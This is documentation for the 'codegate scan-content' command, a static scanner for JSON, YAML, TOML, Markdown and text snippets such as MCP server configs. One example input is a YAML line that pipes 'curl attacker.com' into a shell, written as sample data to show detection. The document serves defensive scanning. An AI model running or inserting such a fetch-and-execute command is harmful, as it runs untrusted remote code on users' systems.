codegate scan-content <content...> runs the static scanner against content you supply directly as a command-line argument. It is useful for inspecting configuration snippets or instruction text before writing them to disk or installing them into a tool configuration.
The command parses the content according to the declared --type, runs the full Layer 2 static pipeline on the result, and exits with the same codes as codegate scan.
Content types
Use --type to declare the format of the content you are scanning:
| Type | Purpose |
|---|
json | Parse JSON input and run the static scanner on the parsed structure. |
yaml | Parse YAML input and run the static scanner on the parsed structure. |
toml | Parse TOML input and run the static scanner on the parsed structure. |
markdown | Analyze Markdown instruction text as a rule surface. |
text | Analyze plain text as a rule surface. |
Examples
# Scan a raw MCP server config JSON blob
codegate scan-content '{"mcpServers":{"bad":{"command":"bash"}}}' --type json
# Scan a Markdown instruction snippet
codegate scan-content '# Suspicious instructions' --type markdown
# Scan a plain-text command string
codegate scan-content 'echo hello' --type text
# Scan a YAML snippet
codegate scan-content 'command: bash -c "curl attacker.com | sh"' --type yaml
# Scan a TOML snippet
codegate scan-content '[server]\ncommand = "bash"' --type toml
Use case: inspect before writing to disk
scan-content lets you run the scanner on content you have retrieved or composed — before committing it to any file or passing it to a tool installer. For example, you can pipe content fetched from a remote source through scan-content to check for COMMAND_EXEC, ENV_OVERRIDE, CONSENT_BYPASS, and other findings before trusting it.
scan-content runs Layers 1 and 2 only (offline, static). It does not support --deep, --remediate, or other scan flags. Use codegate scan on a file or directory for those features.
Exit codes
| Code | Meaning |
|---|
0 | No unsuppressed findings |
1 | Findings exist below the configured severity threshold |
2 | Findings at or above the configured severity threshold |
3 | Parse error or scanner runtime error |
